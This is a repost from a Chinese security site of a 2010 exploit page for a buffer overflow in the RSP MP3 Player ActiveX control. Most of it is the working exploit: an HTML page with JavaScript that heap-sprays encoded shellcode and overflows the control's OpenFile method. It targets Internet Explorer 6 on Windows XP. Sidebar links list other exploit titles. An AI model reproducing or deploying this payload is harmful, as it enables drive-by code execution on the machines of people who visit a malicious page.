RSP MP3 Player OCX ActiveX Buffer Overflow (heap spray)

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

RSP MP3 Player OCX ActiveX Buffer Overflow (heap spray)

来源：Dz8(a)Hotmail.com 作者：MadjiX 发布时间：2010-08-11

<html>
 
 . . . \ / 
 |\/| _. _| ** >< 
 | |(_](_] ||/ \ 
 ._| 
 
 RSP MP3 Player OCX ActiveX Buffer Overflow (heap spray)
 By : MadjiX , Dz8(a)Hotmail.com
 Discovered by Blake: http://www.exploit-db.com/exploits/14309/
 Greetings: His0k4 , Bibi-info , The g0bl!n (y) , sec4ever.com
 Tested on Windows Xp Sp3 (Fr),with IE6
<object classid='clsid:3C88113F-8CEC-48DC-A0E5-983EF9458687' id='target' ></object>
<script>
sh = unescape('%uc931%ue983%ud9de%ud9ee%u2474%u5bf4%u7381%u3d13%u5e46%u8395'+
 '%ufceb%uf4e2%uaec1%u951a%u463d%ud0d5%ucd01%u9022%u4745%u1eb1'+
 '%u5e72%ucad5%u471d%udcb5%u72b6%u94d5%u77d3%u0c9e%uc291%ue19e'+
 '%u873a%u9894%u843c%u61b5%u1206%u917a%ua348%ucad5%u4719%uf3b5'+
 '%u4ab6%u1e15%u5a62%u7e5f%u5ab6%u94d5%ucfd6%ub102%u8539%u556f'+
 '%ucd59%ua51e%u86b8%u9926%u06b6%u1e52%u5a4d%u1ef3%u4e55%u9cb5'+
 '%uc6b6%u95ee%u463d%ufdd5%u1901%u636f%u105d%u6dd7%u86be%uc525'+
 '%u3855%u7786%u2e4e%u6bc6%u48b7%u6a09%u25da%uf93f%u465e%u955e');

n=unescape('%u9090%u9090');
h = 20;
s= h + sh.length;
while(n.length<s) n+=n;
f=n.substring(0,s);
b=n.substring(0,n.length-s);
while(b.length+s<0x40000) b=b+b+f;
memory=new Array();
for( counter=0; counter<250; counter++) memory[counter]= b + sh;
ret='';
for( counter=0; counter<=1000; counter++) ret+=unescape("%0a%0a%0a%0a");

target.OpenFile(ret);

</script>
</html>

[

推荐] [

评论(0条)] [返回顶部] [打印本页] [关闭窗口]

匿名评论

评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。

§最新评论：

热点文章

·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1

推荐广告